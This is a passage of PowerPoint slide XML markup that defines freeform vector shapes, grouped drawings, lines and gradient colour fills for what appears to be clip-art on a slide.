                  <a:gd name="T4" fmla="*/ 449 w 449"/>
                  <a:gd name="T5" fmla="*/ 217 h 217"/>
                  <a:gd name="T6" fmla="*/ 449 w 449"/>
                  <a:gd name="T7" fmla="*/ 120 h 217"/>
                  <a:gd name="T8" fmla="*/ 0 w 449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9" y="217"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="449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1B2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6" name="Freeform 547"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="gray">
              <a:xfrm>
                <a:off x="1104" y="-1174"/>
                <a:ext cx="1344" cy="458"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 0 w 1344"/>
                  <a:gd name="T1" fmla="*/ 458 h 458"/>
                  <a:gd name="T2" fmla="*/ 0 w 1344"/>
                  <a:gd name="T3" fmla="*/ 361 h 458"/>
                  <a:gd name="T4" fmla="*/ 1344 w 1344"/>
                  <a:gd name="T5" fmla="*/ 0 h 458"/>
                  <a:gd name="T6" fmla="*/ 1344 w 1344"/>
                  <a:gd name="T7" fmla="*/ 97 h 458"/>
                  <a:gd name="T8" fmla="*/ 0 w 1344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458"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="0" y="361"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1344" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1344" y="97"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="458"/>
                    </a:lnTo>
                    <a:close/>
                  </a:path>
                </a:pathLst>
              </a:custGeom>
              <a:solidFill>
                <a:srgbClr val="0061B2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77" name="Group 276"/>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="1884416" y="2441788"/>
              <a:ext cx="1447867" cy="583606"/>
              <a:chOff x="2312103" y="2617779"/>
              <a:chExt cx="1631950" cy="657807"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="278" name="Freeform 1310"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="gray">
              <a:xfrm>
                <a:off x="2312103" y="2820979"/>
                <a:ext cx="1631950" cy="439738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noFill/>
              <a:ln w="38100" algn="ctr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ACACA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9" name="Line 1706"/>
              <p:cNvSpPr>
                <a:spLocks noChangeShapeType="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="gray">
              <a:xfrm>
                <a:off x="2432753" y="2762241"/>
                <a:ext cx="0" cy="25082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80" name="Line 1707"/>
              <p:cNvSpPr>
                <a:spLocks noChangeShapeType="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="gray">
              <a:xfrm>
                <a:off x="2791528" y="2654291"/>
                <a:ext cx="0" cy="25082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81" name="Group 1688"/>
              <p:cNvGrpSpPr>
                <a:grpSpLocks/>
              </p:cNvGrpSpPr>
              <p:nvPr/>
            </p:nvGrpSpPr>
            <p:grpSpPr bwMode="auto">
              <a:xfrm flipH="1">
                <a:off x="2756603" y="2617779"/>
                <a:ext cx="236538" cy="201613"/>
                <a:chOff x="4876" y="-3681"/>
                <a:chExt cx="865" cy="735"/>
              </a:xfrm>
            </p:grpSpPr>
            <p:sp>
              <p:nvSpPr>
                <p:cNvPr id="307" name="Freeform 1689"/>
                <p:cNvSpPr>
                  <a:spLocks/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="gray">
                <a:xfrm>
                  <a:off x="5536" y="-3537"/>
                  <a:ext cx="205" cy="506"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 43 w 87"/>
                    <a:gd name="T1" fmla="*/ 9 h 214"/>
                    <a:gd name="T2" fmla="*/ 14 w 87"/>
                    <a:gd name="T3" fmla="*/ 190 h 214"/>
                    <a:gd name="T4" fmla="*/ 69 w 87"/>
                    <a:gd name="T5" fmla="*/ 197 h 214"/>
                    <a:gd name="T6" fmla="*/ 75 w 87"/>
                    <a:gd name="T7" fmla="*/ 4 h 214"/>
                    <a:gd name="T8" fmla="*/ 43 w 87"/>
                    <a:gd name="T9" fmla="*/ 9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7" h="214">
                      <a:moveTo>
                        <a:pt x="43" y="9"/>
                      </a:moveTo>
                      <a:cubicBezTo>
                        <a:pt x="30" y="17"/>
                        <a:pt x="0" y="171"/>
                        <a:pt x="14" y="190"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="27" y="209"/>
                        <a:pt x="49" y="214"/>
                        <a:pt x="69" y="197"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="87" y="182"/>
                        <a:pt x="87" y="16"/>
                        <a:pt x="75" y="4"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="75" y="4"/>
                        <a:pt x="58" y="0"/>
                        <a:pt x="43" y="9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1690"/>
                <p:cNvSpPr>
                  <a:spLocks/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="gray">
                <a:xfrm>
                  <a:off x="5054" y="-3681"/>
                  <a:ext cx="630" cy="654"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 14 w 267"/>
                    <a:gd name="T1" fmla="*/ 8 h 277"/>
                    <a:gd name="T2" fmla="*/ 14 w 267"/>
                    <a:gd name="T3" fmla="*/ 206 h 277"/>
                    <a:gd name="T4" fmla="*/ 247 w 267"/>
                    <a:gd name="T5" fmla="*/ 268 h 277"/>
                    <a:gd name="T6" fmla="*/ 247 w 267"/>
                    <a:gd name="T7" fmla="*/ 70 h 277"/>
                    <a:gd name="T8" fmla="*/ 14 w 267"/>
                    <a:gd name="T9" fmla="*/ 8 h 2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67" h="277">
                      <a:moveTo>
                        <a:pt x="14" y="8"/>
                      </a:moveTo>
                      <a:cubicBezTo>
                        <a:pt x="0" y="16"/>
                        <a:pt x="1" y="187"/>
                        <a:pt x="14" y="206"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="27" y="225"/>
                        <a:pt x="234" y="277"/>
                        <a:pt x="247" y="268"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="259" y="260"/>
                        <a:pt x="267" y="108"/>
                        <a:pt x="247" y="70"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="240" y="56"/>
                        <a:pt x="28" y="0"/>
                        <a:pt x="14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09" name="Freeform 1691"/>
                <p:cNvSpPr>
                  <a:spLocks/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="gray">
                <a:xfrm>
                  <a:off x="5117" y="-3620"/>
                  <a:ext cx="489" cy="527"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 0 w 489"/>
                    <a:gd name="T1" fmla="*/ 0 h 527"/>
                    <a:gd name="T2" fmla="*/ 0 w 489"/>
                    <a:gd name="T3" fmla="*/ 397 h 527"/>
                    <a:gd name="T4" fmla="*/ 489 w 489"/>
                    <a:gd name="T5" fmla="*/ 527 h 527"/>
                    <a:gd name="T6" fmla="*/ 489 w 489"/>
                    <a:gd name="T7" fmla="*/ 130 h 527"/>
                    <a:gd name="T8" fmla="*/ 0 w 489"/>
                    <a:gd name="T9" fmla="*/ 0 h 5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9" h="527">
                      <a:moveTo>
                        <a:pt x="0" y="0"/>
                      </a:moveTo>
                      <a:lnTo>
                        <a:pt x="0" y="397"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="489" y="527"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="489" y="13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69A2E1"/>
                    </a:gs>
                    <a:gs pos="100000">
                      <a:srgbClr val="69A2E1">
                        <a:gamma/>
                        <a:tint val="68627"/>
                        <a:invGamma/>
                      </a:srgbClr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10" name="Freeform 1692"/>
                <p:cNvSpPr>
                  <a:spLocks/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="gray">
                <a:xfrm>
                  <a:off x="5087" y="-3681"/>
                  <a:ext cx="640" cy="172"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 100 w 271"/>
                    <a:gd name="T1" fmla="*/ 14 h 73"/>
                    <a:gd name="T2" fmla="*/ 41 w 271"/>
                    <a:gd name="T3" fmla="*/ 4 h 73"/>
                    <a:gd name="T4" fmla="*/ 0 w 271"/>
                    <a:gd name="T5" fmla="*/ 8 h 73"/>
                    <a:gd name="T6" fmla="*/ 233 w 271"/>
                    <a:gd name="T7" fmla="*/ 70 h 73"/>
                    <a:gd name="T8" fmla="*/ 265 w 271"/>
                    <a:gd name="T9" fmla="*/ 65 h 73"/>
                    <a:gd name="T10" fmla="*/ 100 w 271"/>
                    <a:gd name="T11" fmla="*/ 14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1" h="73">
                      <a:moveTo>
                        <a:pt x="100" y="14"/>
                      </a:moveTo>
                      <a:cubicBezTo>
                        <a:pt x="77" y="9"/>
                        <a:pt x="48" y="4"/>
                        <a:pt x="41" y="4"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="33" y="4"/>
                        <a:pt x="7" y="2"/>
                        <a:pt x="0" y="8"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="7" y="0"/>
                        <a:pt x="222" y="60"/>
                        <a:pt x="233" y="70"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="237" y="73"/>
                        <a:pt x="271" y="69"/>
                        <a:pt x="265" y="65"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="257" y="59"/>
                        <a:pt x="161" y="29"/>
                        <a:pt x="100" y="1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11" name="Freeform 1693"/>
                <p:cNvSpPr>
                  <a:spLocks/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="gray">
                <a:xfrm>
                  <a:off x="4876" y="-3154"/>
                  <a:ext cx="660" cy="175"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 0 w 660"/>
                    <a:gd name="T1" fmla="*/ 52 h 175"/>
                    <a:gd name="T2" fmla="*/ 208 w 660"/>
                    <a:gd name="T3" fmla="*/ 0 h 175"/>
                    <a:gd name="T4" fmla="*/ 660 w 660"/>
                    <a:gd name="T5" fmla="*/ 120 h 175"/>
                    <a:gd name="T6" fmla="*/ 452 w 660"/>
                    <a:gd name="T7" fmla="*/ 175 h 175"/>
                    <a:gd name="T8" fmla="*/ 0 w 660"/>
                    <a:gd name="T9" fmla="*/ 52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0" h="175">
                      <a:moveTo>
                        <a:pt x="0" y="52"/>
                      </a:moveTo>
                      <a:lnTo>
                        <a:pt x="208" y="0"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="660" y="120"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="452" y="175"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="0" y="5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12" name="Freeform 1694"/>
                <p:cNvSpPr>
                  <a:spLocks/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="gray">
                <a:xfrm>
                  <a:off x="5328" y="-3034"/>
                  <a:ext cx="198" cy="88"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 0 w 198"/>
                    <a:gd name="T1" fmla="*/ 55 h 88"/>
                    <a:gd name="T2" fmla="*/ 0 w 198"/>
                    <a:gd name="T3" fmla="*/ 88 h 88"/>
                    <a:gd name="T4" fmla="*/ 198 w 198"/>
                    <a:gd name="T5" fmla="*/ 36 h 88"/>
                    <a:gd name="T6" fmla="*/ 198 w 198"/>
                    <a:gd name="T7" fmla="*/ 0 h 88"/>
                    <a:gd name="T8" fmla="*/ 0 w 198"/>
                    <a:gd name="T9" fmla="*/ 55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8" h="88">
                      <a:moveTo>
                        <a:pt x="0" y="55"/>
                      </a:moveTo>
                      <a:lnTo>
                        <a:pt x="0" y="88"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="198" y="36"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="198" y="0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13" name="Freeform 1695"/>
                <p:cNvSpPr>
                  <a:spLocks/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="gray">
                <a:xfrm>
                  <a:off x="4876" y="-3102"/>
                  <a:ext cx="452" cy="156"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 452 w 452"/>
                    <a:gd name="T1" fmla="*/ 156 h 156"/>
                    <a:gd name="T2" fmla="*/ 0 w 452"/>
                    <a:gd name="T3" fmla="*/ 35 h 156"/>
                    <a:gd name="T4" fmla="*/ 0 w 452"/>
                    <a:gd name="T5" fmla="*/ 0 h 156"/>
                    <a:gd name="T6" fmla="*/ 452 w 452"/>
                    <a:gd name="T7" fmla="*/ 123 h 156"/>
                    <a:gd name="T8" fmla="*/ 452 w 452"/>
                    <a:gd name="T9" fmla="*/ 156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2" h="156">
                      <a:moveTo>
                        <a:pt x="452" y="156"/>
                      </a:moveTo>
                      <a:lnTo>
                        <a:pt x="0" y="35"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="0" y="0"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="452" y="123"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="452" y="15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Freeform 1696"/>
                <p:cNvSpPr>
                  <a:spLocks/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="gray">
                <a:xfrm>
                  <a:off x="4938" y="-3140"/>
                  <a:ext cx="517" cy="139"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 0 w 517"/>
                    <a:gd name="T1" fmla="*/ 38 h 139"/>
                    <a:gd name="T2" fmla="*/ 383 w 517"/>
                    <a:gd name="T3" fmla="*/ 139 h 139"/>
                    <a:gd name="T4" fmla="*/ 517 w 517"/>
                    <a:gd name="T5" fmla="*/ 104 h 139"/>
                    <a:gd name="T6" fmla="*/ 135 w 517"/>
                    <a:gd name="T7" fmla="*/ 0 h 139"/>
                    <a:gd name="T8" fmla="*/ 0 w 517"/>
                    <a:gd name="T9" fmla="*/ 38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7" h="139">
                      <a:moveTo>
                        <a:pt x="0" y="38"/>
                      </a:moveTo>
                      <a:lnTo>
                        <a:pt x="383" y="139"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="517" y="104"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="135" y="0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82" name="Group 1697"/>
              <p:cNvGrpSpPr>
                <a:grpSpLocks/>
              </p:cNvGrpSpPr>
              <p:nvPr/>
            </p:nvGrpSpPr>
            <p:grpSpPr bwMode="auto">
              <a:xfrm flipH="1">
                <a:off x="2396240" y="2720966"/>
                <a:ext cx="236538" cy="201613"/>
                <a:chOff x="4876" y="-3681"/>
                <a:chExt cx="865" cy="735"/>
              </a:xfrm>
            </p:grpSpPr>
            <p:sp>
              <p:nvSpPr>
                <p:cNvPr id="299" name="Freeform 1698"/>
                <p:cNvSpPr>
                  <a:spLocks/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="gray">
                <a:xfrm>
                  <a:off x="5536" y="-3537"/>
                  <a:ext cx="205" cy="506"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 43 w 87"/>
                    <a:gd name="T1" fmla="*/ 9 h 214"/>
                    <a:gd name="T2" fmla="*/ 14 w 87"/>
                    <a:gd name="T3" fmla="*/ 190 h 214"/>
                    <a:gd name="T4" fmla="*/ 69 w 87"/>
                    <a:gd name="T5" fmla="*/ 197 h 214"/>
                    <a:gd name="T6" fmla="*/ 75 w 87"/>
                    <a:gd name="T7" fmla="*/ 4 h 214"/>
                    <a:gd name="T8" fmla="*/ 43 w 87"/>
                    <a:gd name="T9" fmla="*/ 9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7" h="214">
                      <a:moveTo>
                        <a:pt x="43" y="9"/>
                      </a:moveTo>
                      <a:cubicBezTo>
                        <a:pt x="30" y="17"/>
                        <a:pt x="0" y="171"/>
                        <a:pt x="14" y="190"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="27" y="209"/>
                        <a:pt x="49" y="214"/>
                        <a:pt x="69" y="197"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="87" y="182"/>
                        <a:pt x="87" y="16"/>
                        <a:pt x="75" y="4"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="75" y="4"/>
                        <a:pt x="58" y="0"/>
                        <a:pt x="43" y="9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00" name="Freeform 1699"/>
                <p:cNvSpPr>
                  <a:spLocks/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="gray">
                <a:xfrm>
                  <a:off x="5054" y="-3681"/>
                  <a:ext cx="630" cy="654"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 14 w 267"/>
                    <a:gd name="T1" fmla="*/ 8 h 277"/>
                    <a:gd name="T2" fmla="*/ 14 w 267"/>
                    <a:gd name="T3" fmla="*/ 206 h 277"/>
                    <a:gd name="T4" fmla="*/ 247 w 267"/>
                    <a:gd name="T5" fmla="*/ 268 h 277"/>
                    <a:gd name="T6" fmla="*/ 247 w 267"/>
                    <a:gd name="T7" fmla="*/ 70 h 277"/>
                    <a:gd name="T8" fmla="*/ 14 w 267"/>
                    <a:gd name="T9" fmla="*/ 8 h 2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67" h="277">
                      <a:moveTo>
                        <a:pt x="14" y="8"/>
                      </a:moveTo>
                      <a:cubicBezTo>
                        <a:pt x="0" y="16"/>
                        <a:pt x="1" y="187"/>
                        <a:pt x="14" y="206"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="27" y="225"/>
                        <a:pt x="234" y="277"/>
                        <a:pt x="247" y="268"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="259" y="260"/>
                        <a:pt x="267" y="108"/>
                        <a:pt x="247" y="70"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="240" y="56"/>
                        <a:pt x="28" y="0"/>
                        <a:pt x="14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01" name="Freeform 1700"/>
                <p:cNvSpPr>
                  <a:spLocks/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="gray">
                <a:xfrm>
                  <a:off x="5117" y="-3620"/>
                  <a:ext cx="489" cy="527"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 0 w 489"/>
                    <a:gd name="T1" fmla="*/ 0 h 527"/>
                    <a:gd name="T2" fmla="*/ 0 w 489"/>
                    <a:gd name="T3" fmla="*/ 397 h 527"/>
                    <a:gd name="T4" fmla="*/ 489 w 489"/>
                    <a:gd name="T5" fmla="*/ 527 h 527"/>
                    <a:gd name="T6" fmla="*/ 489 w 489"/>
                    <a:gd name="T7" fmla="*/ 130 h 527"/>
                    <a:gd name="T8" fmla="*/ 0 w 489"/>
                    <a:gd name="T9" fmla="*/ 0 h 5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9" h="527">
                      <a:moveTo>
                        <a:pt x="0" y="0"/>
                      </a:moveTo>
                      <a:lnTo>
                        <a:pt x="0" y="397"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="489" y="527"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="489" y="13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69A2E1"/>
                    </a:gs>
                    <a:gs pos="100000">
                      <a:srgbClr val="69A2E1">
                        <a:gamma/>
                        <a:tint val="70588"/>
                        <a:invGamma/>
                      </a:srgbClr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02" name="Freeform 1701"/>
                <p:cNvSpPr>
                  <a:spLocks/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="gray">
                <a:xfrm>
                  <a:off x="5087" y="-3681"/>
                  <a:ext cx="640" cy="172"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 100 w 271"/>
                    <a:gd name="T1" fmla="*/ 14 h 73"/>
                    <a:gd name="T2" fmla="*/ 41 w 271"/>
                    <a:gd name="T3" fmla="*/ 4 h 73"/>
                    <a:gd name="T4" fmla="*/ 0 w 271"/>
                    <a:gd name="T5" fmla="*/ 8 h 73"/>
                    <a:gd name="T6" fmla="*/ 233 w 271"/>
                    <a:gd name="T7" fmla="*/ 70 h 73"/>
                    <a:gd name="T8" fmla="*/ 265 w 271"/>
                    <a:gd name="T9" fmla="*/ 65 h 73"/>
                    <a:gd name="T10" fmla="*/ 100 w 271"/>
                    <a:gd name="T11" fmla="*/ 14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1" h="73">
                      <a:moveTo>
                        <a:pt x="100" y="14"/>
                      </a:moveTo>
                      <a:cubicBezTo>
                        <a:pt x="77" y="9"/>
                        <a:pt x="48" y="4"/>
                        <a:pt x="41" y="4"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="33" y="4"/>
                        <a:pt x="7" y="2"/>
                        <a:pt x="0" y="8"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="7" y="0"/>
                        <a:pt x="222" y="60"/>
                        <a:pt x="233" y="70"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="237" y="73"/>
                        <a:pt x="271" y="69"/>
                        <a:pt x="265" y="65"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="257" y="59"/>
                        <a:pt x="161" y="29"/>
                        <a:pt x="100" y="1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03" name="Freeform 1702"/>
                <p:cNvSpPr>
                  <a:spLocks/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="gray">
                <a:xfrm>
                  <a:off x="4876" y="-3154"/>
                  <a:ext cx="660" cy="175"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 0 w 660"/>
                    <a:gd name="T1" fmla="*/ 52 h 175"/>
                    <a:gd name="T2" fmla="*/ 208 w 660"/>
                    <a:gd name="T3" fmla="*/ 0 h 175"/>
                    <a:gd name="T4" fmla="*/ 660 w 660"/>
                    <a:gd name="T5" fmla="*/ 120 h 175"/>
                    <a:gd name="T6" fmla="*/ 452 w 660"/>
                    <a:gd name="T7" fmla="*/ 175 h 175"/>
                    <a:gd name="T8" fmla="*/ 0 w 660"/>
                    <a:gd name="T9" fmla="*/ 52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0" h="175">
                      <a:moveTo>
                        <a:pt x="0" y="52"/>
                      </a:moveTo>
                      <a:lnTo>
                        <a:pt x="208" y="0"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="660" y="120"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="452" y="175"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="0" y="5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04" name="Freeform 1703"/>
                <p:cNvSpPr>
                  <a:spLocks/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="gray">
                <a:xfrm>
                  <a:off x="5328" y="-3034"/>
                  <a:ext cx="198" cy="88"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 0 w 198"/>
                    <a:gd name="T1" fmla="*/ 55 h 88"/>
                    <a:gd name="T2" fmla="*/ 0 w 198"/>
                    <a:gd name="T3" fmla="*/ 88 h 88"/>
                    <a:gd name="T4" fmla="*/ 198 w 198"/>
                    <a:gd name="T5" fmla="*/ 36 h 88"/>
                    <a:gd name="T6" fmla="*/ 198 w 198"/>
                    <a:gd name="T7" fmla="*/ 0 h 88"/>
                    <a:gd name="T8" fmla="*/ 0 w 198"/>
                    <a:gd name="T9" fmla="*/ 55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8" h="88">
                      <a:moveTo>
                        <a:pt x="0" y="55"/>
                      </a:moveTo>
                      <a:lnTo>
                        <a:pt x="0" y="88"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="198" y="36"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="198" y="0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Freeform 1704"/>
                <p:cNvSpPr>
                  <a:spLocks/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="gray">
                <a:xfrm>
                  <a:off x="4876" y="-3102"/>
                  <a:ext cx="452" cy="156"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 452 w 452"/>
                    <a:gd name="T1" fmla="*/ 156 h 156"/>
                    <a:gd name="T2" fmla="*/ 0 w 452"/>
                    <a:gd name="T3" fmla="*/ 35 h 156"/>
                    <a:gd name="T4" fmla="*/ 0 w 452"/>
                    <a:gd name="T5" fmla="*/ 0 h 156"/>
                    <a:gd name="T6" fmla="*/ 452 w 452"/>
                    <a:gd name="T7" fmla="*/ 123 h 156"/>
                    <a:gd name="T8" fmla="*/ 452 w 452"/>
                    <a:gd name="T9" fmla="*/ 156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2" h="156">
                      <a:moveTo>
                        <a:pt x="452" y="156"/>
                      </a:moveTo>
                      <a:lnTo>
                        <a:pt x="0" y="35"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="0" y="0"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="452" y="123"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="452" y="15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Freeform 1705"/>
                <p:cNvSpPr>
                  <a:spLocks/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="gray">
                <a:xfrm>
                  <a:off x="4938" y="-3140"/>
                  <a:ext cx="517" cy="139"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 0 w 517"/>
                    <a:gd name="T1" fmla="*/ 38 h 139"/>
                    <a:gd name="T2" fmla="*/ 383 w 517"/>
                    <a:gd name="T3" fmla="*/ 139 h 139"/>
                    <a:gd name="T4" fmla="*/ 517 w 517"/>
                    <a:gd name="T5" fmla="*/ 104 h 139"/>
                    <a:gd name="T6" fmla="*/ 135 w 517"/>
                    <a:gd name="T7" fmla="*/ 0 h 139"/>
                    <a:gd name="T8" fmla="*/ 0 w 517"/>
                    <a:gd name="T9" fmla="*/ 38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7" h="139">
                      <a:moveTo>
                        <a:pt x="0" y="38"/>
                      </a:moveTo>
                      <a:lnTo>
                        <a:pt x="383" y="139"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="517" y="104"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="135" y="0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83" name="Line 1724"/>
              <p:cNvSpPr>
                <a:spLocks noChangeShapeType="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="gray">
              <a:xfrm>
                <a:off x="3129083" y="3132711"/>
                <a:ext cx="0" cy="14287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84" name="Group 1787"/>
              <p:cNvGrpSpPr>
                <a:grpSpLocks/>
              </p:cNvGrpSpPr>
              <p:nvPr/>
            </p:nvGrpSpPr>
            <p:grpSpPr bwMode="auto">
              <a:xfrm flipH="1">
                <a:off x="2504190" y="2689216"/>
                <a:ext cx="246063" cy="382588"/>
                <a:chOff x="2363" y="1132"/>
                <a:chExt cx="343" cy="529"/>
              </a:xfrm>
            </p:grpSpPr>
            <p:sp>
              <p:nvSpPr>
                <p:cNvPr id="294" name="Freeform 1788"/>
                <p:cNvSpPr>
                  <a:spLocks/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="gray">
                <a:xfrm>
                  <a:off x="2474" y="1449"/>
                  <a:ext cx="145" cy="189"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 108 w 108"/>
                    <a:gd name="T1" fmla="*/ 36 h 140"/>
                    <a:gd name="T2" fmla="*/ 108 w 108"/>
                    <a:gd name="T3" fmla="*/ 35 h 140"/>
                    <a:gd name="T4" fmla="*/ 108 w 108"/>
                    <a:gd name="T5" fmla="*/ 28 h 140"/>
                    <a:gd name="T6" fmla="*/ 108 w 108"/>
                    <a:gd name="T7" fmla="*/ 23 h 140"/>
                    <a:gd name="T8" fmla="*/ 108 w 108"/>
                    <a:gd name="T9" fmla="*/ 22 h 140"/>
                    <a:gd name="T10" fmla="*/ 108 w 108"/>
                    <a:gd name="T11" fmla="*/ 17 h 140"/>
                    <a:gd name="T12" fmla="*/ 108 w 108"/>
                    <a:gd name="T13" fmla="*/ 16 h 140"/>
                    <a:gd name="T14" fmla="*/ 108 w 108"/>
                    <a:gd name="T15" fmla="*/ 16 h 140"/>
                    <a:gd name="T16" fmla="*/ 89 w 108"/>
                    <a:gd name="T17" fmla="*/ 7 h 140"/>
                    <a:gd name="T18" fmla="*/ 64 w 108"/>
